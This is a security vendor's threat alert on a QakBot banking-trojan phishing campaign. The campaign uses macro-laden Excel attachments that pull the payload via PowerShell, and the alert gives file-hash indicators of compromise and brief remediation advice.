March 12, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Rewterz Threat Alert – SNAKE Ransomware – Active IOCs
September 28, 2021Rewterz Threat Advisory – CVE-2021-20317 – Linux Kernel Vulnerability
September 28, 2021Rewterz Threat Alert – SNAKE Ransomware – Active IOCs
September 28, 2021Rewterz Threat Advisory – CVE-2021-20317 – Linux Kernel Vulnerability
September 28, 2021
Severity
High
Analysis Summary
A massive maldoc campaign delivering the QakBot/QBot banking trojan is detected. Qakbot leverages advanced techniques to evade detection and hamper manual analysis of the threat. QakBot attacks typically include a malicious attachment to a phishing email. Often these are bare Microsoft Word or excel documents attached to the spam email. This particular campaign features an xls file that includes macros within the document. These macros execute a PowerShell script that then downloads the Qakbot payload from specific URLs. The attackers use a common tactic to lure the victim to enable macros: when the target downloads the file, it asks the target to enable editing and then enable content in order to view the document.
Impact
- Unauthorized Access
- Financial Theft
- Information theft
Indicators of Compromise
MD5
- b19b0af9a01dd936d091c291b19696c8
SHA-256
- 17d261eaca2629ef9907d0c00fb2271201e466796f06dcb7232900d711c29330
SHA-1
- 862ed0b9586729f2633670ccd7d075d7693908e1
Remediation
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.